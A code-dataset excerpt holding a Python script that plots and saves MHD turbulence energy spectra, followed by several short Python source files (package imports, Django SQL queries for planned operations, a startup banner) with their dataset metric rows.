ntrans_upe_bpe_l_bin = sum_negative_kz2d(ntrans_upe_bpe_l_bin)
ntrans_upa_upa_l_bin = sum_negative_kz2d(ntrans_upa_upa_l_bin)
ntrans_bpa_upa_l_bin = sum_negative_kz2d(ntrans_bpa_upa_l_bin)
ntrans_bpa_bpa_l_bin = sum_negative_kz2d(ntrans_bpa_bpa_l_bin)
ntrans_upa_bpa_l_bin = sum_negative_kz2d(ntrans_upa_bpa_l_bin)
ntrans_upe_upe_g_bin = sum_negative_kz2d(ntrans_upe_upe_g_bin)
ntrans_bpe_upe_g_bin = sum_negative_kz2d(ntrans_bpe_upe_g_bin)
ntrans_bpe_bpe_g_bin = sum_negative_kz2d(ntrans_bpe_bpe_g_bin)
ntrans_upe_bpe_g_bin = sum_negative_kz2d(ntrans_upe_bpe_g_bin)
ntrans_upa_upa_g_bin = sum_negative_kz2d(ntrans_upa_upa_g_bin)
ntrans_bpa_upa_g_bin = sum_negative_kz2d(ntrans_bpa_upa_g_bin)
ntrans_bpa_bpa_g_bin = sum_negative_kz2d(ntrans_bpa_bpa_g_bin)
ntrans_upa_bpa_g_bin = sum_negative_kz2d(ntrans_upa_bpa_g_bin)
# Total nonlinear transfer for the "aw" (_pe) and "compr" (_pa) channels,
# split into the _l and _g contributions summed over the four term pairs.
ntrans_aw_l_bin = ntrans_upe_upe_l_bin + ntrans_bpe_upe_l_bin + ntrans_bpe_bpe_l_bin + ntrans_upe_bpe_l_bin
ntrans_aw_g_bin = ntrans_upe_upe_g_bin + ntrans_bpe_upe_g_bin + ntrans_bpe_bpe_g_bin + ntrans_upe_bpe_g_bin
ntrans_compr_l_bin = ntrans_upa_upa_l_bin + ntrans_bpa_upa_l_bin + ntrans_bpa_bpa_l_bin + ntrans_upa_bpa_l_bin
ntrans_compr_g_bin = ntrans_upa_upa_g_bin + ntrans_bpa_upa_g_bin + ntrans_bpa_bpa_g_bin + ntrans_upa_bpa_g_bin
# Upper index cutoffs for plotting: when the grid is fully resolved
# (nlz == nkz) cut at 2/3 of the maximum wavenumber; otherwise use the
# whole available range.
if nlz == nkz:
    kp_end = np.argmin(np.abs(kpbin - kpbin.max()*2./3.))
    if not is2D:
        kz_end = np.argmin(np.abs(kz[1:int(nkz/2)] - kz[1:int(nkz/2)].max()*2./3.))
else:
    kp_end = kpbin.size - 1
    kz_end = int(nkz/2)
# NOTE(review): when nlz == nkz and is2D, kz_end is never assigned above but
# is still used as a slice bound in the ascii output below -- confirm that
# combination cannot occur in practice.
#--------------------------------------------------------#
#                    plot 1D spectra                     #
#--------------------------------------------------------#
# kprp spectrum: field energies vs k_perp (summed over kz) at the final time
# slice; the last entry is a -5/3 reference slope anchored to E_{B_perp}.
ys = [
    np.sum(upe2_bin[final_idx, :, 1:kp_end], axis=0),
    np.sum(bpe2_bin[final_idx, :, 1:kp_end], axis=0),
    np.sum(upa2_bin[final_idx, :, 1:kp_end], axis=0),
    np.sum(bpa2_bin[final_idx, :, 1:kp_end], axis=0),
    kpbin[1:kp_end]**(-5./3.)/kpbin[1]**(-5./3.)*np.sum(bpe2_bin[final_idx,:,1:kp_end], axis=0)[0]
]
xs = [
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
]
ls = [
    '',
    '',
    '',
    '',
    'k--',
]
legends = [
    r'$E_{u_\+}$',
    r'$E_{\delta B_\+}$',
    r'$E_{u_\|}$',
    r'$E_{\delta B_\|}$',
    r'-5/3',
]
plot_log1d_many(xs, ys, xlab='$k_\+ L_\+$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kprp_spectra.pdf')
# kprp spectrum by components
ys = [
    np.sum(upe2_bin[final_idx, :, 1:kp_end], axis=0),
    np.sum(ux2_bin [final_idx, :, 1:kp_end], axis=0),
    np.sum(uy2_bin [final_idx, :, 1:kp_end], axis=0),
    np.sum(bpe2_bin[final_idx, :, 1:kp_end], axis=0),
    np.sum(bx2_bin [final_idx, :, 1:kp_end], axis=0),
    np.sum(by2_bin [final_idx, :, 1:kp_end], axis=0),
    kpbin[1:kp_end]**(-5./3.)/kpbin[1]**(-5./3.)*np.sum(bpe2_bin[final_idx,:,1:kp_end], axis=0)[0]
]
xs = [
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end]
]
# line styles: red for velocity components, blue for magnetic, black for slope
ls = [
    'r-',
    'r--',
    'r:',
    'b-',
    'b--',
    'b:',
    'k--',
]
legends = [
    r'$E_{u_\+}$',
    r'$E_{u_x}$',
    r'$E_{u_y}$',
    r'$E_{\delta B_\+}$',
    r'$E_{\delta B_x}$',
    r'$E_{\delta B_y}$',
    r'-5/3',
]
plot_log1d_many(xs, ys, xlab='$k_\+ L_\+$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kprp_spectra_components.pdf')
# kprp spectrum by MRI injection rate and nonlinear transfer rate
# (dissipation terms enter with a minus sign so sinks plot as positive losses)
ys = [
    np.sum(p_aw_bin [final_idx,:,1:kp_end], axis=0),
    np.sum(p_compr_bin [final_idx,:,1:kp_end], axis=0),
    -np.sum(dissip_aw_bin [final_idx,:,1:kp_end], axis=0),
    -np.sum(dissip_compr_bin [final_idx,:,1:kp_end], axis=0),
    np.sum(ntrans_aw_l_bin [final_idx,:,1:kp_end], axis=0),
    np.sum(ntrans_aw_g_bin [final_idx,:,1:kp_end], axis=0),
    np.sum(ntrans_compr_l_bin[final_idx,:,1:kp_end], axis=0),
    np.sum(ntrans_compr_g_bin[final_idx,:,1:kp_end], axis=0),
]
xs = [
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end]
]
ls = [
    '',
    '',
    '',
    '',
    '',
    '',
    '',
    '',
]
legends = [
    r'$I_\mr{AW}$',
    r'$I_\mr{compr}$',
    r'$-\calD_\mr{AW}$',
    r'$-\calD_\mr{compr}$',
    r'$\calN_\mr{AW}^{<k_\+}$',
    r'$\calN_\mr{AW}^{>k_\+}$',
    r'$\calN_\mr{compr}^{<k_\+}$',
    r'$\calN_\mr{compr}^{>k_\+}$',
]
plot_log1d_many(xs, ys, xlab='$k_\+ L_\+$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kprp_spectra_flux.pdf')
# Elsasser fields
ys = [
    np.sum(zpep2_bin [final_idx, :, 1:kp_end], axis=0),
    np.sum(zpem2_bin [final_idx, :, 1:kp_end], axis=0),
    np.sum(zpap2_bin [final_idx, :, 1:kp_end], axis=0),
    np.sum(zpam2_bin [final_idx, :, 1:kp_end], axis=0),
    kpbin[1:kp_end]**(-5./3.)/kpbin[1]**(-5./3.)*np.sum(zpep2_bin[final_idx,:,1:kp_end], axis=0)[0],
    kpbin[1:kp_end]**(-3./2.)/kpbin[1]**(-3./2.)*np.sum(zpep2_bin[final_idx,:,1:kp_end], axis=0)[0]
]
xs = [
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end],
    kpbin[1:kp_end]
]
ls = [
    '',
    '',
    '',
    '',
    'k--',
    'k--',
]
legends = [
    r'$E_{Z^+_\+}$',
    r'$E_{Z^-_\+}$',
    r'$E_{Z^+_\|}$',
    r'$E_{Z^-_\|}$',
    r'-5/3',
    r'-3/2',
]
plot_log1d_many(xs, ys, xlab='$k_\+ L_\+$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kprp_spectra_ELS.pdf')
# kz spectrum (only meaningful for 3D runs, hence skipped when is2D)
if not is2D:
    ys = [
        np.sum(upe2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
        np.sum(bpe2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
        np.sum(upa2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
        np.sum(bpa2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
    ]
    xs = [
        kz[1:kz_end],
        kz[1:kz_end],
        kz[1:kz_end],
        kz[1:kz_end],
    ]
    ls = [
        '',
        '',
        '',
        '',
    ]
    legends = [
        r'$E_{u_\+}$',
        r'$E_{\delta B_\+}$',
        r'$E_{u_\|}$',
        r'$E_{\delta B_\|}$',
    ]
    plot_log1d_many(xs, ys, xlab='$'+kzlab+'$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kz_spectra.pdf')
    # Elsasser fields
    ys = [
        np.sum(zpep2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
        np.sum(zpem2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
        np.sum(zpap2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
        np.sum(zpam2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
    ]
    xs = [
        kz[1:kz_end],
        kz[1:kz_end],
        kz[1:kz_end],
        kz[1:kz_end],
    ]
    ls = [
        '',
        '',
        '',
        '',
    ]
    legends = [
        r'$E_{Z^+_\+}$',
        r'$E_{Z^-_\+}$',
        r'$E_{Z^+_\|}$',
        r'$E_{Z^-_\|}$',
    ]
    plot_log1d_many(xs, ys, xlab='$'+kzlab+'$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kz_spectra_ELS.pdf')
    # MRI injection rate and nonlinear transfer rate
    ys = [
        np.sum(p_aw_bin [final_idx,1:kz_end,:kp_end], axis=1),
        np.sum(p_compr_bin [final_idx,1:kz_end,:kp_end], axis=1),
        -np.sum(dissip_aw_bin [final_idx,1:kz_end,:kp_end], axis=1),
        -np.sum(dissip_compr_bin [final_idx,1:kz_end,:kp_end], axis=1),
        np.sum(ntrans_aw_l_bin [final_idx,1:kz_end,:kp_end], axis=1),
        np.sum(ntrans_aw_g_bin [final_idx,1:kz_end,:kp_end], axis=1),
        np.sum(ntrans_compr_l_bin[final_idx,1:kz_end,:kp_end], axis=1),
        np.sum(ntrans_compr_g_bin[final_idx,1:kz_end,:kp_end], axis=1),
    ]
    xs = [
        kz[1:kz_end],
        kz[1:kz_end],
        kz[1:kz_end],
        kz[1:kz_end],
        kz[1:kz_end],
        kz[1:kz_end],
        kz[1:kz_end],
        kz[1:kz_end],
    ]
    ls = [
        '',
        '',
        '',
        '',
        '',
        '',
        '',
        '',
    ]
    legends = [
        r'$I_\mr{AW}$',
        r'$I_\mr{compr}$',
        r'$-\calD_\mr{AW}$',
        r'$-\calD_\mr{compr}$',
        r'$\calN_\mr{AW}^{<k_\+}$',
        r'$\calN_\mr{AW}^{>k_\+}$',
        r'$\calN_\mr{compr}^{<k_\+}$',
        r'$\calN_\mr{compr}^{>k_\+}$',
    ]
    plot_log1d_many(xs, ys, xlab='$'+kzlab+'$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kz_spectra_flux.pdf')
#--------------------------------------------------------#
#                    plot 2D spectra                     #
#--------------------------------------------------------#
if not is2D:
    plot_log2d(upe2_bin[final_idx, 1:kz_end, 1:kp_end], kpbin[1:kp_end], kz[1:kz_end], xlab='$k_\+ L_\+$', ylab='$'+kzlab+'$',
               title=r'$E_{u_{\+}}$' + ' $(t = $ %.2E' % tt[final_idx] + '$)$', save=outdir + 'upe2.pdf')
    plot_log2d(bpe2_bin[final_idx, 1:kz_end, 1:kp_end], kpbin[1:kp_end], kz[1:kz_end], xlab='$k_\+ L_\+$', ylab='$'+kzlab+'$',
               title=r'$E_{\delta B_\+}$' + ' $(t = $ %.2E' % tt[final_idx] + '$)$', save=outdir + 'bpe2.pdf')
#------------------#
#   output ascii   #
#------------------#
# Ekprp.txt: one row per k_perp bin; columns follow the array order below.
np.savetxt(outdir + 'Ekprp.txt' , np.column_stack((kpbin[:kp_end],
           np.sum(upe2_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(bpe2_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(upa2_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(bpa2_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ux2_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(uy2_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(bx2_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(by2_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(zpep2_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(zpem2_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(zpap2_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(zpam2_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(p_aw_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(p_compr_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(dissip_aw_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(dissip_compr_bin [final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_upe_upe_l_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_bpe_upe_l_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_bpe_bpe_l_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_upe_bpe_l_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_upa_upa_l_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_bpa_upa_l_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_bpa_bpa_l_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_upa_bpa_l_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_upe_upe_g_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_bpe_upe_g_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_bpe_bpe_g_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_upe_bpe_g_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_upa_upa_g_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_bpa_upa_g_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_bpa_bpa_g_bin[final_idx,:kz_end,:kp_end], axis=0),
           np.sum(ntrans_upa_bpa_g_bin[final_idx,:kz_end,:kp_end], axis=0),
           )), fmt='%E')
# Ekz.txt: same columns but summed over k_perp (axis=1), 3D runs only.
if not is2D:
    np.savetxt(outdir + 'Ekz.txt' , np.column_stack((kz[:kz_end],
               np.sum(upe2_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(bpe2_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(upa2_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(bpa2_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ux2_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(uy2_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(bx2_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(by2_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(zpep2_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(zpem2_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(zpap2_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(zpam2_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(p_aw_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(p_compr_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(dissip_aw_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(dissip_compr_bin [final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_upe_upe_l_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_bpe_upe_l_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_bpe_bpe_l_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_upe_bpe_l_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_upa_upa_l_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_bpa_upa_l_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_bpa_bpa_l_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_upa_bpa_l_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_upe_upe_g_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_bpe_upe_g_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_bpe_bpe_g_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_upe_bpe_g_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_upa_upa_g_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_bpa_upa_g_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_bpa_bpa_g_bin[final_idx,:kz_end,:kp_end], axis=1),
               np.sum(ntrans_upa_bpa_g_bin[final_idx,:kz_end,:kp_end], axis=1),
               )), fmt='%E')
# Release the largest arrays once plotting/output is done.
del upe2_bin
del bpe2_bin
del upa2_bin
del bpa2_bin
| 49.676923
| 192
| 0.470063
| 2,664
| 19,374
| 3.033408
| 0.047673
| 0.088479
| 0.147012
| 0.098998
| 0.882812
| 0.862022
| 0.854721
| 0.803118
| 0.801757
| 0.798911
| 0
| 0.031199
| 0.366367
| 19,374
| 389
| 193
| 49.804627
| 0.627077
| 0.031382
| 0
| 0.432961
| 0
| 0
| 0.060409
| 0.013021
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00838
| 0
| 0.00838
| 0.002793
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0bb1961cf283c490645b9723db267a2de4f7f348
| 76
|
py
|
Python
|
app/controllers/__init__.py
|
ZehLuckmann/integracao
|
030f5f696367857b9a47dfec703f2a1b3021a26e
|
[
"MIT"
] | 2
|
2019-03-02T22:18:18.000Z
|
2020-05-14T21:21:35.000Z
|
app/controllers/__init__.py
|
ZehLuckmann/integracao
|
030f5f696367857b9a47dfec703f2a1b3021a26e
|
[
"MIT"
] | null | null | null |
app/controllers/__init__.py
|
ZehLuckmann/integracao
|
030f5f696367857b9a47dfec703f2a1b3021a26e
|
[
"MIT"
] | null | null | null |
# app/controllers/__init__.py
# coding:utf-8
from app.controllers import *
| 15.2
| 29
| 0.763158
| 11
| 76
| 4.909091
| 0.818182
| 0.518519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014925
| 0.118421
| 76
| 4
| 30
| 19
| 0.791045
| 0.526316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f045454c44f5748f54fb9edeb8683d33773ca946
| 71
|
py
|
Python
|
ONet/defense/__init__.py
|
code-roamer/IF-Defense
|
4e2462b66fa1eac90cfbf61fa0dc635d223fdf2f
|
[
"MIT"
] | 36
|
2020-10-07T05:52:15.000Z
|
2022-03-11T03:05:32.000Z
|
ONet/defense/__init__.py
|
code-roamer/IF-Defense
|
4e2462b66fa1eac90cfbf61fa0dc635d223fdf2f
|
[
"MIT"
] | 9
|
2021-01-04T02:11:36.000Z
|
2021-11-23T16:21:59.000Z
|
ONet/defense/__init__.py
|
Wuziyi616/IF-Defense
|
4b1d69d03d76e8d5ca1b4d45f81a8c9c60791263
|
[
"MIT"
] | 6
|
2020-11-29T02:13:55.000Z
|
2021-12-06T08:19:16.000Z
|
from .SOR import SORDefense
from .repulsion_loss import repulsion_loss
| 23.666667
| 42
| 0.859155
| 10
| 71
| 5.9
| 0.6
| 0.440678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 71
| 2
| 43
| 35.5
| 0.936508
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f054a6e6d6cde64fa78480f407f69b16ed6b70b3
| 5,135
|
py
|
Python
|
api/plans/sql_func.py
|
D00dleman/l2
|
0870144537ee340cd8db053a608d731e186f02fb
|
[
"MIT"
] | 10
|
2018-03-14T06:17:06.000Z
|
2022-03-10T05:33:34.000Z
|
api/plans/sql_func.py
|
hlebuschek/l2
|
2f25cf69b990121c3109fb7bbff04c09ca284694
|
[
"MIT"
] | 512
|
2018-09-10T07:37:34.000Z
|
2022-03-30T02:23:43.000Z
|
api/plans/sql_func.py
|
D00dleman/l2
|
0870144537ee340cd8db053a608d731e186f02fb
|
[
"MIT"
] | 24
|
2018-07-31T05:52:12.000Z
|
2022-02-08T00:39:41.000Z
|
from django.db import connection
from laboratory.settings import TIME_ZONE
def get_plans_by_params_sql(d_s, d_e, doc_operate_id, doc_anesthetist_id, department):
    """
    Fetch planned operations in a date range, with patient details attached.

    params: d_s - date-start, d_e - date-end, doc_operate_id - operating-doctor
    filter, doc_anesthetist_id - anesthetist filter, department - department filter.
    Each id filter applies only when it is > -1 (see the SQL CASE); otherwise
    only the date range restricts the result.
    :return: list of raw rows from cursor.fetchall()
    """
    with connection.cursor() as cursor:
        # Named pyformat parameters (%(name)s) are bound via ``params`` below;
        # the date range is compared in the server-side TIME_ZONE.
        cursor.execute(
            """WITH
            t_plans AS
            (SELECT id as pk_plan, patient_card_id, direction,
            to_char(date AT TIME ZONE %(tz)s, 'DD.MM.YYYY') AS date_char,
            type_operation, doc_operate_id, doc_anesthetist_id, canceled, date FROM plans_planoperations
            WHERE
            CASE when %(doc_operate_id)s > -1 THEN
            doc_operate_id = %(doc_operate_id)s AND date AT TIME ZONE %(tz)s BETWEEN %(d_start)s AND %(d_end)s
            when %(doc_anesthetist_id)s > -1 THEN
            doc_anesthetist_id = %(doc_anesthetist_id)s AND date AT TIME ZONE %(tz)s BETWEEN %(d_start)s AND %(d_end)s
            when %(department_id)s > -1 THEN
            date AT TIME ZONE %(tz)s BETWEEN %(d_start)s AND %(d_end)s AND doc_operate_id in (SELECT id FROM users_doctorprofile where podrazdeleniye_id=%(department_id)s)
            ELSE date AT TIME ZONE %(tz)s BETWEEN %(d_start)s AND %(d_end)s
            END
            ORDER BY date),
            t_patient AS
            (SELECT clients_card.id as card_id, clients_card.individual_id, clients_individual.family as ind_family,
            clients_individual.name AS ind_name, clients_individual.patronymic as ind_twoname, to_char(clients_individual.birthday, 'DD.MM.YYYY') as birthday
            FROM clients_individual
            LEFT JOIN clients_card ON clients_individual.id = clients_card.individual_id
            WHERE clients_card.id in (SELECT patient_card_id FROM t_plans))
            SELECT pk_plan, patient_card_id, direction, date_char, type_operation, doc_operate_id, doc_anesthetist_id, canceled,
            ind_family, ind_name, ind_twoname, birthday, date FROM t_plans
            LEFT JOIN t_patient ON t_plans.patient_card_id = t_patient.card_id ORDER BY date
            """,
            params={'d_start': d_s, 'd_end': d_e, 'tz': TIME_ZONE, 'doc_operate_id': doc_operate_id, 'doc_anesthetist_id': doc_anesthetist_id, 'department_id': department},
        )
        row = cursor.fetchall()
    return row
def get_plans_by_pk(pks_plan):
    """
    Fetch planned operations by primary key, joined with patient details and
    the operating doctor's / anesthetist's profile and department titles.

    params: pks_plan - plans_planoperations primary key(s), expanded into
    ``id = ANY(ARRAY[...])`` in the query
    :return: list of raw rows from cursor.fetchall()
    """
    # NOTE(review): the previous docstring was copy-pasted from
    # get_plans_by_params_sql and described parameters this function
    # does not take; it has been corrected above.
    with connection.cursor() as cursor:
        cursor.execute(
            """WITH
            t_plans AS
            (SELECT id as pk_plan,
            patient_card_id,
            direction,
            to_char(date AT TIME ZONE %(tz)s, 'DD.MM.YYYY') AS date_char,
            type_operation,
            doc_operate_id,
            doc_anesthetist_id,
            canceled,
            date
            FROM plans_planoperations
            WHERE id = ANY(ARRAY[%(pks_plan)s])
            ORDER BY date),
            t_patient AS
            (SELECT clients_card.id as card_id, clients_card.individual_id, clients_individual.family as ind_family,
            clients_individual.name AS ind_name, clients_individual.patronymic as ind_twoname, to_char(clients_individual.birthday, 'DD.MM.YYYY') as birthday
            FROM clients_individual
            LEFT JOIN clients_card ON clients_individual.id = clients_card.individual_id
            WHERE clients_card.id in (SELECT patient_card_id FROM t_plans)),
            t_podrazdeleniye AS (
            SELECT id as id, title as title_podr, short_title FROM podrazdeleniya_podrazdeleniya),
            t_users_doc AS (
            SELECT users_doctorprofile.id as doc_id, user_id, podrazdeleniye_id, fio, t_podrazdeleniye.title_podr as podr_title,
            t_podrazdeleniye.short_title as short_podr_title
            FROM users_doctorprofile
            LEFT JOIN t_podrazdeleniye ON users_doctorprofile.podrazdeleniye_id = t_podrazdeleniye.id
            ),
            t_users_anesthetist AS (
            SELECT users_doctorprofile.id as doc_id, user_id, podrazdeleniye_id, fio, t_podrazdeleniye.title_podr as podr_title,
            t_podrazdeleniye.short_title as short_podr_title
            FROM users_doctorprofile
            LEFT JOIN t_podrazdeleniye ON users_doctorprofile.podrazdeleniye_id = t_podrazdeleniye.id
            )
            SELECT pk_plan, patient_card_id, direction, date_char, type_operation, doc_operate_id, t_users_doc.fio, t_users_doc.short_podr_title,
            doc_anesthetist_id, t_users_anesthetist.fio, canceled, ind_family, ind_name, ind_twoname, birthday, date, t_users_doc.podr_title FROM t_plans
            LEFT JOIN t_patient ON t_plans.patient_card_id = t_patient.card_id
            LEFT JOIN t_users_doc ON t_users_doc.doc_id = t_plans.doc_operate_id
            LEFT JOIN t_users_anesthetist ON t_users_anesthetist.doc_id = t_plans.doc_anesthetist_id
            ORDER BY date
            """,
            params={'pks_plan': pks_plan, 'tz': TIME_ZONE},
        )
        row = cursor.fetchall()
    return row
| 47.990654
| 172
| 0.666796
| 718
| 5,135
| 4.43454
| 0.119777
| 0.030151
| 0.045226
| 0.032977
| 0.81407
| 0.75691
| 0.714196
| 0.714196
| 0.714196
| 0.687814
| 0
| 0.000792
| 0.262317
| 5,135
| 106
| 173
| 48.443396
| 0.839757
| 0.035248
| 0
| 0.444444
| 0
| 0
| 0.09691
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f08474e5767b8c9877afcf8e3e1fd60d0d3a21c2
| 221
|
py
|
Python
|
gangue.py
|
Shardj/py-gangue
|
d02e4e0b0c85069cb4ca9c507be77ecaac51dd73
|
[
"MIT"
] | null | null | null |
gangue.py
|
Shardj/py-gangue
|
d02e4e0b0c85069cb4ca9c507be77ecaac51dd73
|
[
"MIT"
] | null | null | null |
gangue.py
|
Shardj/py-gangue
|
d02e4e0b0c85069cb4ca9c507be77ecaac51dd73
|
[
"MIT"
] | null | null | null |
# Entry point
import pyfiglet
from app.configs.local import projectName
# Render the project name as an ASCII-art "slant" banner on startup.
print(pyfiglet.figlet_format(projectName, font = "slant"))
import core.packages.router.route_manager as route_manager
# Instantiating the route manager kicks off the application's routing.
# NOTE(review): "RouteManger" looks like a typo for "RouteManager", but it
# must match the class name declared in core.packages.router.route_manager --
# confirm there before renaming either side.
route_manager.RouteManger()
| 22.1
| 58
| 0.823529
| 29
| 221
| 6.137931
| 0.724138
| 0.202247
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095023
| 221
| 9
| 59
| 24.555556
| 0.89
| 0.049774
| 0
| 0
| 0
| 0
| 0.024038
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0.2
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
